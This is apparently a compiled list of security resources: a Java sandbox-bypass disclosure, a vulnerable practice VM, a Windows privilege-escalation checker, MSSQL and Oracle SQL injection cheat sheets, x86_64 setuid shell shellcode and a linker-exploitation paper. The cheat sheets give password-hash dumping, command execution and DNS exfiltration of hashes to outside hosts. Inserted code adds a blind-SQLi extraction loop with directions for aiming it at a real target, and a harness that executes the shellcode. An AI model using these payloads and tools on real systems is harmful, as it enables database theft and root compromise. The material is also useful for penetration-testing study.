Our Proof of Concept code for Issue 69 was confirmed to work with flying colors under Java SE 7 Update 25 (1.7.0_25-b16) and below. The code allows to violate a fundamental feature of Java VM security - the safety of its type system. As a result, a complete and reliable Java security sandbox bypass can be gained on a vulnerable instance of Oracle's Java SE software.

Oracle's blog post published on May 30, 2013 [2] implies that maintaining the security-worthiness of Java has been Oracle's priority following the acquisition of Sun Microsystems. Oracle's VP goes even further by indicating that "acquired product lines [such as Java SE] were required to conform to Oracle policies and procedures, including those comprising Oracle Software Security Assurance" [3].

If Oracle had any Software Security Assurance procedures adopted for Java SE, most of simple Reflection API flaws along with a known, 10+ years old attack should have been eliminated prior to Java SE 7 release. This didn't happen, thus it is reasonable to assume that Oracle's security policies and procedures are either not worth much or their implementation is far from perfect. That thought alone should catch attention of Oracle customers not necessarily relying on Java SE, but rather on other Oracle products, which were likely the subject to the very same, questionable Software Security Assurance policies and procedures as Java SE 7.

--

As for other things, we released technical details and Proof of Concept code for a previously reported security vulnerability (Issue 61) that got fixed by Oracle's Java SE CPU in Jun 2013:

http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf
http://www.security-explorations.com/materials/se-2012-01-61.zip

We also released technical details and Proof of Concept codes for several (9 in total) IBM Java flaws that were addressed by the company in early Jul 2013:

http://www.security-explorations.com/materials/SE-2012-01-IBM-2.pdf
http://www.security-explorations.com/materials/se-2012-01-62-68.zip

The above includes details of trivially broken fixes for vulnerabilities reported to IBM in Sep 2012 (Issues 35-37 and 49). One of the issues is also a nice illustration of the "allowed behavior" (Issue 54) for other than Oracle's Java VM implementations.

Finally, we published information (and some comment) about CVE numbers assigned by Oracle to vulnerabilities reported by Security Explorations as part of SE-2012-01 project:

http://www.security-explorations.com/materials/SE-2012-01-CVE_Map.pdf

Thank you.

Best Regards
Adam Gowdiak

---------------------------------------------
Security Explorations
"We bring security research to the new level"
---------------------------------------------

References:
[1] Java and Java VM security vulnerabilities and their exploitation techniques, Last Stage of Delirium Research Group, Welcome to LSD-PLaNET
[2] Maintaining the security-worthiness of Java is Oracle's priority, https://blogs.oracle.com/security/entry/maintaining_the_security_worthiness_of
[3] Oracle Software Security Assurance, Importance of Software Security Assurance

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [Full-Disclosure] Mailing List Charter
Hosted and sponsored by Secunia - Computer Security - Software & Alerts - Secunia

Source: Full Disclosure: [SE-2012-01] New Reflection API affected by a known 10+ years old attack
  14. Implementation and Evaluation of Datagram Transport Layer Security (DTLS) for the Android Operating System

Master's Degree Project, Stockholm, Sweden, June 2012

Abstract

Smartphones are nowadays a tool that everyone possesses. With the replacement of IPv4 with IPv6 it is possible to connect to the Internet an extremely large number of electronic devices. Those two factors are the premises to use smartphones to access those devices over a hybrid network, composed of Wireless Sensor Networks, IPv6-based Internet of Things, constrained networks and the conventional Internet. Some of these networks are very lossy and use the UDP protocol, hence the most suitable protocol to access resources is CoAP, a connection-less variant of the HTTP protocol, standardized as web protocol for the Internet of Things. The sensitivity of information and the Machine-to-Machine interaction as well as the presence of humans make End-to-End security one of the requirements of the IPv6 Internet of Things. Secure CoAP (CoAPS) provides security for the CoAP protocol in this context.

In this thesis secure CoAP for Android smartphones is designed, implemented and evaluated, which is at the moment the first work that enables CoAPS for smartphones. All the cryptographic cipher suites proposed in the CoAP protocol, among which the pre-shared key and certificate-based authentications, are implemented, using Elliptic Curve Cryptography and the AES algorithm in CCM mode. The feasibility of this implementation is evaluated on a Nexus phone, which takes the handshake time in order to exchange parameters to secure the connection to about five seconds, and an increase from one to three seconds of the DTLS retransmission timer. Apart from these initial delays, the performances using secure CoAP are comparable to the performances obtained using the same protocol without security. The implementation also allows securing the UDP transport thanks to the DTLS implementation, allowing any potential application to exchange secure data and have mutual authentication.

Download: http://t.co/BFQbAeNWn4
15. Vulnerabilities in Full/Virtual Disk Encryption Products

Neil Kettle
neil/mu-b@digit-labs.org - digit-labs.org
neil@digit-security.com - Digit Security Ltd
SEC-T '10

Outline: Agenda; FAQ (Why Bother? Why Bother With Drivers?); Random Info; Disclaimer; Products & Vulnerabilities (Generic Driver Design, Products & Vulnerabilities, Vulnerability Matrix); Conclusions; References

Download: http://www.digit-labs.org/files/presentations/sec-t-2010.pdf
16. [h=2]Vulnix (Vulnerable Linux) Release 1.0[/h]

Posted on September 10, 2012 by owen

Here we have a vulnerable Linux host with configuration weaknesses rather than purposely vulnerable software versions (well, at the time of release anyway!). The host is based upon Ubuntu Server 12.04 and is fully patched as of early September 2012. The details are as follows:

Architecture: x86
Format: VMware (vmx & vmdk), compatible with version 4 onwards
RAM: 512MB
Network: NAT
Extracted size: 820MB
Compressed (download size): 194MB, 7zip format (7zip can be obtained from here)
MD5 hash of Vulnix.7z: 0bf19d11836f72d22f30bf52cd585757

- Download Vulnix from HERE -

The goal: boot up, find the IP, hack away and obtain the trophy hidden away in /root by any means you wish, excluding the actual hacking of the vmdk.

Feel free to contact me with any questions/comments using the comments section below. Enjoy!

Source: Vulnix (Vulnerable Linux) Release 1.0 - Rebootuser
Solutions: Vulnix (release 1.0) Solutions - Rebootuser
17. [h=1]windows-privesc-check[/h]

A long time ago, I started writing a tool to look for local privilege escalation vectors on Windows systems, e.g. weak permissions on files, directories, service registry keys. I never quite got round to finishing it, but the project could still be useful to pentesters and auditors in its current part-finished state. I'd suggest giving it a try next time you do a security audit with local administrator rights, or next time you get a non-admin logon to a Windows system during a pentest. It was designed to be useful for both.

Trunk contains the best all-round version. It checks some file, directory, registry and service permissions (among other things). Reports are in HTML.

The newer wpc-2.0 branch does a better job at auditing Windows services, but does little else. Reports are in text only.

You only need to download the .exe file. Full source code is available too, though. It's written in Python, uses pywin32 and is "compiled" with pyinstaller. You don't need to download any dependencies (even Python) unless you're planning to build the .exe yourself.

[h=2]FAQ[/h]

[h=3]Why 2 versions?[/h]
The code in "trunk" wasn't object-oriented, making it harder to work with. I rewrote it to create the "wpc-2.0" branch. Much better, but alas, not finished.

[h=3]Can I see the source code?[/h]
Yes, it's on Google Code along with the executables.

[h=3]Will the program elevate privileges for me?[/h]
No. It gives you a report describing any potential vulnerabilities it finds, but doesn't have any autopwn features. This is mostly to reduce the risk of my code accidentally breaking your client's system.

Source: windows-privesc-check | pentestmonkey
18. [h=1]MSSQL Injection Cheat Sheet[/h]

Some useful syntax reminders for SQL Injection into MSSQL databases...

This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endeavoured to tabulate the data to make it easier to read and to use the same table for each database backend. This helps to highlight any features which are lacking for each database, enumeration techniques that don't apply, and also areas that I haven't got round to researching yet.

The complete list of SQL Injection Cheat Sheets I'm working on is: Oracle, MSSQL, MySQL, PostgreSQL, Ingres, DB2, Informix. I'm not planning to write one for MS Access, but there's a great MS Access Cheat Sheet here.

Some of the queries in the table below can only be run by an admin. These are marked with "-- priv" at the end of the query.

Version
    SELECT @@version

Comments
    SELECT 1 -- comment
    SELECT /*comment*/1

Current User
    SELECT user_name();
    SELECT system_user;
    SELECT user;
    SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID

List Users
    SELECT name FROM master..syslogins

List Password Hashes
    SELECT name, password FROM master..sysxlogins -- priv, mssql 2000
    SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins -- priv, mssql 2000. Need to convert to hex to return hashes in MSSQL error message / some versions of query analyzer.
    SELECT name, password_hash FROM master.sys.sql_logins -- priv, mssql 2005
    SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins -- priv, mssql 2005

Password Cracker
    MSSQL 2000 and 2005 hashes are both SHA1-based. phrasen|drescher can crack these.

List Privileges
    -- current privs on a particular object in 2005, 2008
    SELECT permission_name FROM master..fn_my_permissions(null, 'DATABASE'); -- current database
    SELECT permission_name FROM master..fn_my_permissions(null, 'SERVER'); -- current server
    SELECT permission_name FROM master..fn_my_permissions('master..syslogins', 'OBJECT'); -- permissions on a table
    SELECT permission_name FROM master..fn_my_permissions('sa', 'USER'); -- permissions on a user
    -- current privs in 2005, 2008
    SELECT is_srvrolemember('sysadmin');
    SELECT is_srvrolemember('dbcreator');
    SELECT is_srvrolemember('bulkadmin');
    SELECT is_srvrolemember('diskadmin');
    SELECT is_srvrolemember('processadmin');
    SELECT is_srvrolemember('serveradmin');
    SELECT is_srvrolemember('setupadmin');
    SELECT is_srvrolemember('securityadmin');
    -- who has a particular priv? 2005, 2008
    SELECT name FROM master..syslogins WHERE denylogin = 0;
    SELECT name FROM master..syslogins WHERE hasaccess = 1;
    SELECT name FROM master..syslogins WHERE isntname = 0;
    SELECT name FROM master..syslogins WHERE isntgroup = 0;
    SELECT name FROM master..syslogins WHERE sysadmin = 1;
    SELECT name FROM master..syslogins WHERE securityadmin = 1;
    SELECT name FROM master..syslogins WHERE serveradmin = 1;
    SELECT name FROM master..syslogins WHERE setupadmin = 1;
    SELECT name FROM master..syslogins WHERE processadmin = 1;
    SELECT name FROM master..syslogins WHERE diskadmin = 1;
    SELECT name FROM master..syslogins WHERE dbcreator = 1;
    SELECT name FROM master..syslogins WHERE bulkadmin = 1;

List DBA Accounts
    SELECT is_srvrolemember('sysadmin'); -- is your account a sysadmin? returns 1 for true, 0 for false, NULL for invalid role. Also try 'bulkadmin', 'systemadmin' and other values from the documentation
    SELECT is_srvrolemember('sysadmin', 'sa'); -- is sa a sysadmin? returns 1 for true, 0 for false, NULL for invalid role/username.
    SELECT name FROM master..syslogins WHERE sysadmin = '1' -- tested on 2005

Current Database
    SELECT DB_NAME()

List Databases
    SELECT name FROM master..sysdatabases;
    SELECT DB_NAME(N); -- for N = 0, 1, 2, ...

List Columns
    SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); -- for the current DB only
    SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list column names and types for master..sometable

List Tables
    SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views
    SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
    SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list column names and types for master..sometable

Find Tables From Column Name
    -- NB: This example works only for the current database. If you want to search another db, you need to specify the db name (e.g. replace sysobjects with mydb..sysobjects).
    SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' -- this lists table, column for each column containing the word 'password'

Select Nth Row
    SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC -- gets 9th row

Select Nth Char
    SELECT substring('abcd', 3, 1) -- returns c

Bitwise AND
    SELECT 6 & 2 -- returns 2
    SELECT 6 & 1 -- returns 0

ASCII Value -> Char
    SELECT char(0x41) -- returns A

Char -> ASCII Value
    SELECT ascii('A') -- returns 65

Casting
    SELECT CAST('1' as int);
    SELECT CAST(1 as char)

String Concatenation
    SELECT 'A' + 'B' -- returns AB

If Statement
    IF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1

Case Statement
    SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1

Avoiding Quotes
    SELECT char(65)+char(66) -- returns AB

Time Delay
    WAITFOR DELAY '0:0:5' -- pause for 5 seconds

Make DNS Requests
    declare @host varchar(800); select @host = name FROM master..syslogins; exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini'''); -- nonpriv, works on 2000
    declare @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini'''); -- priv, works on 2005
    -- NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary.
    -- Also check out the DNS tunnel feature of sqlninja

Command Execution
    EXEC xp_cmdshell 'net user'; -- priv
    On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:
    EXEC sp_configure 'show advanced options', 1; -- priv
    RECONFIGURE; -- priv
    EXEC sp_configure 'xp_cmdshell', 1; -- priv
    RECONFIGURE; -- priv

Local File Access
    CREATE TABLE mydata (line varchar(8000));
    BULK INSERT mydata FROM 'c:\boot.ini';
    DROP TABLE mydata;

Hostname, IP Address
    SELECT HOST_NAME()

Create Users
    EXEC sp_addlogin 'user', 'pass'; -- priv

Drop Users
    EXEC sp_droplogin 'user'; -- priv

Make User DBA
    EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin'; -- priv

Location of DB files
    EXEC sp_helpdb master; -- location of master.mdf
    EXEC sp_helpdb pubs; -- location of pubs.mdf

Default/System Databases
    northwind
    model
    msdb
    pubs -- not on sql server 2005
    tempdb

[h=3]Misc Tips[/h]

In no particular order, here are some suggestions from pentestmonkey readers.

From Dan Crowley: A way to extract data via SQLi with a MySQL backend

From Jeremy Bae: Tip about sp_helpdb, included in table above.

From Trip: List DBAs (included in table above now):
    select name from master..syslogins where sysadmin = '1'

From Daniele Costa: Tips on using fn_my_permissions in 2005, 2008, included in table above. Also: to check permissions on multiple databases you will have to use the following pattern:
    USE [DBNAME]; select permission_name FROM fn_my_permissions (NULL, 'DATABASE')

Note also that in case of using this data with a UNION query a collation error could occur. In this case a simple trick is to use the following syntax:
    select permission_name collate database_default FROM fn_my_permissions (NULL, 'DATABASE')

Source: MSSQL Injection Cheat Sheet | pentestmonkey
19. [h=1]Oracle SQL Injection Cheat Sheet[/h]

Some useful syntax reminders for SQL Injection into Oracle databases...

This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endeavoured to tabulate the data to make it easier to read and to use the same table for each database backend. This helps to highlight any features which are lacking for each database, enumeration techniques that don't apply, and also areas that I haven't got round to researching yet.

The complete list of SQL Injection Cheat Sheets I'm working on is: Oracle, MSSQL, MySQL, PostgreSQL, Ingres, DB2, Informix. I'm not planning to write one for MS Access, but there's a great MS Access Cheat Sheet here.

Some of the queries in the table below can only be run by an admin. These are marked with "-- priv" at the end of the query.

Version
    SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
    SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
    SELECT version FROM v$instance;

Comments
    SELECT 1 FROM dual -- comment
    -- NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name 'dual' when we're not actually selecting from a table.

Current User
    SELECT user FROM dual

List Users
    SELECT username FROM all_users ORDER BY username;
    SELECT name FROM sys.user$; -- priv

List Password Hashes
    SELECT name, password, astatus FROM sys.user$ -- priv, <= 10g. astatus tells you if acct is locked
    SELECT name, spare4 FROM sys.user$ -- priv, 11g

Password Cracker
    checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10.

List Privileges
    SELECT * FROM session_privs; -- current privs
    SELECT * FROM dba_sys_privs WHERE grantee = 'DBSNMP'; -- priv, list a user's privs
    SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY'; -- priv, find users with a particular priv
    SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;

List DBA Accounts
    SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES'; -- priv, list DBAs, DBA roles

Current Database
    SELECT global_name FROM global_name;
    SELECT name FROM v$database;
    SELECT instance_name FROM v$instance;
    SELECT SYS.DATABASE_NAME FROM DUAL;

List Databases
    SELECT DISTINCT owner FROM all_tables; -- list schemas (one per user)
    -- Also query the TNS listener for other databases. See tnscmd (services | status).

List Columns
    SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
    SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';

List Tables
    SELECT table_name FROM all_tables;
    SELECT owner, table_name FROM all_tables;

Find Tables From Column Name
    SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; -- NB: table names are upper case

Select Nth Row
    SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; -- gets 9th row (rows numbered from 1)

Select Nth Char
    SELECT substr('abcd', 3, 1) FROM dual; -- gets 3rd character, 'c'

Bitwise AND
    SELECT bitand(6,2) FROM dual; -- returns 2
    SELECT bitand(6,1) FROM dual; -- returns 0

ASCII Value -> Char
    SELECT chr(65) FROM dual; -- returns A

Char -> ASCII Value
    SELECT ascii('A') FROM dual; -- returns 65

Casting
    SELECT CAST(1 AS char) FROM dual;
    SELECT CAST('1' AS int) FROM dual;

String Concatenation
    SELECT 'A' || 'B' FROM dual; -- returns AB

If Statement
    BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; -- doesn't play well with SELECT statements

Case Statement
    SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; -- returns 1
    SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- returns 2

Avoiding Quotes
    SELECT chr(65) || chr(66) FROM dual; -- returns AB

Time Delay
    BEGIN DBMS_LOCK.SLEEP(5); END; -- priv, can't seem to embed this in a SELECT
    SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- if reverse lookups are slow
    SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual; -- if forward lookups are slow
    SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual; -- if outbound TCP is filtered / slow
    -- Also see Heavy Queries to create a time delay

Make DNS Requests
    SELECT UTL_INADDR.get_host_address('google.com') FROM dual;
    SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual;

Command Execution
    Java can be used to execute commands if it's installed. ExtProc can sometimes be used too, though it normally failed for me.

Local File Access
    UTL_FILE can sometimes be used. Check that the following is non-null:
    SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';
    Java can be used to read and write files if it's installed (it is not available in Oracle Express).

Hostname, IP Address
    SELECT UTL_INADDR.get_host_name FROM dual;
    SELECT host_name FROM v$instance;
    SELECT UTL_INADDR.get_host_address FROM dual; -- gets IP address
    SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- gets hostnames

Location of DB files
    SELECT name FROM V$DATAFILE;

Default/System Databases
    SYSTEM
    SYSAUX

[h=3]Misc Tips[/h]

In no particular order, here are some suggestions from pentestmonkey readers.

From Christian Mehlmauer:

Get all table names in one string
    select rtrim(xmlagg(xmlelement(e, table_name || ',')).extract('//text()').extract('//text()'), ',') from all_tables -- when using union based SQLI with only one row

Blind SQLI in order by clause
    order by case when ((select 1 from user_tables where substr(lower(table_name), 1, 1) = 'a' and rownum = 1)=1) then column_name1 else column_name2 end -- you must know 2 column names with the same datatype

Source: Oracle SQL Injection Cheat Sheet | pentestmonkey
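The "Select Nth Row", "Select Nth Char" and "Char -> ASCII Value" entries of the two cheat sheets above (MSSQL and Oracle) are the building blocks of boolean-based blind extraction, but neither sheet shows them chained together. The following is an added example, not pentestmonkey's code, that assembles those primitives into one extraction loop for both backends. It sends nothing over the network: the FakeBackend class is a stand-in for the injectable page and evaluates the injected comparison against a constructed, made-up set of login names (SECRET_ROWS), so the whole thing runs offline. The injection point (a string parameter closed with a single quote and terminated with `--`) is an assumption.

```python
"""Boolean-based blind extraction built from the cheat-sheet primitives.

Added example; SECRET_ROWS is constructed sample data standing in for
master..syslogins (MSSQL) and all_users (Oracle).
"""
import re

SECRET_ROWS = {
    "mssql": ["sa", "webapp"],
    "oracle": ["SYS", "SYSTEM"],
}

# Injected condition: true when ASCII(char {pos} of row {row}) > {mid}.
# Row selection is the sheets' "Select Nth Row" trick, the rest is substring/ascii.
TEMPLATES = {
    "mssql": ("' AND ASCII(SUBSTRING((SELECT TOP 1 name FROM (SELECT TOP {row} name "
              "FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC),{pos},1))>{mid}--"),
    "oracle": ("' AND ascii(substr((SELECT username FROM (SELECT ROWNUM r, username "
               "FROM all_users ORDER BY username) WHERE r={row}),{pos},1))>{mid}--"),
}

# How the fake backend recovers (row, pos, mid) from a payload; a real
# database would simply execute the statement.
PARSERS = {
    "mssql": re.compile(r"SELECT TOP (\d+) name FROM master\.\.syslogins.*?DESC\),(\d+),1\)\)>(\d+)"),
    "oracle": re.compile(r"WHERE r=(\d+)\),(\d+),1\)\)>(\d+)"),
}


def make_payload(dbms, row, pos, mid):
    return TEMPLATES[dbms].format(row=row, pos=pos, mid=mid)


class FakeBackend:
    """Stand-in for the vulnerable page: True when the page would render
    its 'condition true' variant, False otherwise."""

    def __init__(self, dbms):
        self.dbms = dbms
        self.queries = 0

    def condition_holds(self, payload):
        self.queries += 1
        m = PARSERS[self.dbms].search(payload)
        if m is None:
            raise ValueError("payload not understood: " + payload)
        row, pos, mid = (int(g) for g in m.groups())
        rows = SECRET_ROWS[self.dbms]
        if row > len(rows):
            return False      # no such row: subquery is NULL, comparison is not true
        value = rows[row - 1]
        if pos > len(value):
            return False      # SUBSTRING/substr past the end: ''/NULL, so ASCII is NULL
        return ord(value[pos - 1]) > mid


def extract_row(backend, row, max_len=64):
    """Recover one row character by character with a binary search over
    ASCII 0..127: 7 requests per character, 7 more to detect the end."""
    out = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if backend.condition_holds(make_payload(backend.dbms, row, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:           # ASCII(NULL) > x is never true: end of string
            break
        out.append(chr(lo))
    return "".join(out)


def dump_logins(dbms):
    """Walk rows 1, 2, ... until an empty row comes back."""
    backend = FakeBackend(dbms)
    rows, row = [], 1
    while True:
        value = extract_row(backend, row)
        if not value:
            break
        rows.append(value)
        row += 1
    return rows


if __name__ == "__main__":
    for dbms in TEMPLATES:
        print(dbms, dump_logins(dbms))
        print("  sample payload:", make_payload(dbms, 1, 1, 64))
```

Against a real target, replace `FakeBackend.condition_holds` with an HTTP request that returns whether the page's true/false marker appeared; the request budget stays at 7 per character (plus 7 per row terminator), which is the number to keep in mind when the "Time Delay" entries are used instead and each request costs several seconds.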
20. setuid(0) + execve("/bin/sh") on x86_64 GNU/Linux

# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
#   list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
#   this list of conditions and the following disclaimer in the documentation
#   and/or other materials provided with the distribution.
# * Neither the name of the Nth Dimension nor the names of its contributors may
#   be used to endorse or promote products derived from this software without
#   specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# (c) Tim Brown, 2009
# <mailto:timb@nth-dimension.org.uk>
# <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>
#
# setuid(0) + execve("/bin/sh") on x86_64 GNU/Linux

.text
.globl _start

_start:
    # uid = 0
    xor %edi, %edi                      # set %edi to 0

    # setuid
    mov $0x69, %al                      # set %al to 0x69 = 105 (setuid)
    syscall                             # enter the kernel

    # *filename = "/bin//sh"
    xor %ax, %ax                        # set %ax to 0
    push %ax                            # push %ax on to the stack (string terminator)
    movq $0x68732f2f6e69622f, %rbx      # set %rbx to "hs//nib/" (little-endian "/bin//sh")
    pushq %rbx                          # push %rbx on to the stack
    movq %rsp, %rdi                     # set %rdi to %rsp (pointer to the string)

    # **argv = [*filename, 0]
    xorq %rcx, %rcx                     # set %rcx to 0
    pushq %rcx                          # push %rcx on to the stack (argv terminator)
    pushq %rdi                          # push %rdi on to the stack (argv[0] = filename)
    movq %rsp, %rsi                     # set %rsi to %rsp (pointer to argv)

    # execve
    mov $0x3b, %al                      # set %al to 0x3b = 59 (execve)
    syscall                             # enter the kernel

I posted it because it is explained.

Source: http://www.nth-dimension.org.uk/pub/setuid_execve_x86_64_Linux.asm
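Two things a practitioner checks before dropping a listing like the one above into an exploit are that the encoded bytes contain no NUL (so they survive a strcpy-style copy) and that the packed 8-byte immediate really spells the filename the kernel will read off the stack. The following added example, which is not part of Tim Brown's file, does both in Python and can also execute the bytes for a live test. The byte string is my own hand-assembly of the instructions above (an assumption: confirm it with `as` and `objdump -d` before relying on it); `run()` is Linux/x86_64 only, replaces the current process with /bin/sh if the syscalls succeed, and is reached only with `--run` on the command line.

```python
"""Harness for the setuid(0) + execve("/bin//sh") x86_64 shellcode.

Added example, not the original author's code. SHELLCODE is a hand
assembly of the listing above (assumption: verify with as/objdump).
"""
import ctypes
import mmap
import sys

SHELLCODE = bytes([
    0x31, 0xff,                          # xor %edi,%edi          uid = 0
    0xb0, 0x69,                          # mov $0x69,%al          setuid
    0x0f, 0x05,                          # syscall
    0x66, 0x31, 0xc0,                    # xor %ax,%ax
    0x66, 0x50,                          # push %ax               string terminator
    0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e,  # movabs $0x68732f2f6e69622f,%rbx
    0x2f, 0x2f, 0x73, 0x68,              #   immediate = "/bin//sh" in memory order
    0x53,                                # push %rbx
    0x48, 0x89, 0xe7,                    # mov %rsp,%rdi          filename
    0x48, 0x31, 0xc9,                    # xor %rcx,%rcx
    0x51,                                # push %rcx              argv[1] = NULL
    0x57,                                # push %rdi              argv[0] = filename
    0x48, 0x89, 0xe6,                    # mov %rsp,%rsi          argv
    0xb0, 0x3b,                          # mov $0x3b,%al          execve
    0x0f, 0x05,                          # syscall
])

FILENAME_IMM_OFFSET = 13   # first byte of the movabs immediate in SHELLCODE


def has_null_byte(code):
    """A NUL anywhere would truncate the payload when delivered via C strings."""
    return b"\x00" in code


def packed_filename(code, offset=FILENAME_IMM_OFFSET):
    """The imm64 is stored little-endian, so its raw bytes are exactly the
    string that ends up on the stack after push %rbx."""
    return code[offset:offset + 8].decode("ascii")


def syscall_numbers(code):
    """Immediates of every `mov $imm8,%al` (opcode 0xb0) in the code."""
    return [code[i + 1] for i in range(len(code) - 1) if code[i] == 0xb0]


def run(code):
    """Linux/x86_64 only: copy into an anonymous RWX mapping and call it.
    On success the process is replaced by /bin/sh and never returns."""
    buf = mmap.mmap(-1, len(code), prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC)
    buf.write(code)
    addr = ctypes.addressof(ctypes.c_char.from_buffer(buf))
    ctypes.CFUNCTYPE(None)(addr)()


if __name__ == "__main__":
    print("length:", len(SHELLCODE), "null bytes:", has_null_byte(SHELLCODE))
    print("filename:", packed_filename(SHELLCODE), "syscalls:", syscall_numbers(SHELLCODE))
    if "--run" in sys.argv:
        run(SHELLCODE)
```

Two properties of the listing are worth knowing before using it outside a controlled harness: both `mov $imm, %al` instructions only write the low byte of %rax, so they rely on the upper bits already being zero, and since setuid returns its result in %rax, a failed setuid (-EPERM, i.e. %rax = 0xffffffffffffffff) leaves the upper bytes set and the second `mov $0x3b, %al` produces a syscall number the kernel rejects with ENOSYS, so no shell is spawned when the process is not already root-capable. Also, %rdx (envp) is never initialised, which the kernel tolerates only if the register happens to hold 0 or a valid pointer at that point. Adding `xor %eax, %eax` before each `mov ... %al` and `xor %edx, %edx` before the second syscall costs a few bytes and removes both dependencies.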
21. Breaking the links: Exploiting the linker

Abstract

The recent discussion relating to insecure library loading on the Microsoft Windows platform provoked a significant amount of debate as to whether GNU/Linux and UNIX variants could be vulnerable to similar attacks. Whilst the general consensus of the Slashdot herd appeared to be that this was just another example of Microsoft doing things wrong, I felt this was unfair and responded with a blog post[1] that sought to highlight an example of where POSIX style linkers get things wrong. Based on the feedback I received to that post, I decided to investigate the issue a little further. This paper is an amalgamation of what I learnt. As such it contains my own research, the discoveries of others and POSIX lore.

Contents

1 Technical Details
  1.1 What is the linker?
    1.1.1 The link editor
    1.1.2 The runtime linker
  1.2 The linker attack surface
    1.2.1 The process of linking and executing
    1.2.2 Environment
    1.2.3 Files
    1.2.4 issetugid() and friends
  1.3 Real world exploitation
    1.3.1 The runtime linker as an interpreter
    1.3.2 The empty library
    1.3.3 SIGSEGV'ing for 12 years
    1.3.4 What's in your RPATH?
    1.3.5 Debian makes me sad
    1.3.6 If an environment variable is set but you don't trust it, is it still there?
    1.3.7 Reflections on Trusting Trust revisited
    1.3.8 Mapping NULL
  1.4 Auditing scripts, binaries and source
    1.4.1 Scripts
    1.4.2 Binaries
    1.4.3 Source
  1.5 Further research
    1.5.1 Other linkers
2 Changes

BTL.pdf (2547 downloads), © Tim Brown, License: n/a. Paper on exploiting linkers. Download BTL.pdf

Source: Nth Dimension/downloads:: Negatively discriminating against idiots since 1995!
22. sucrack

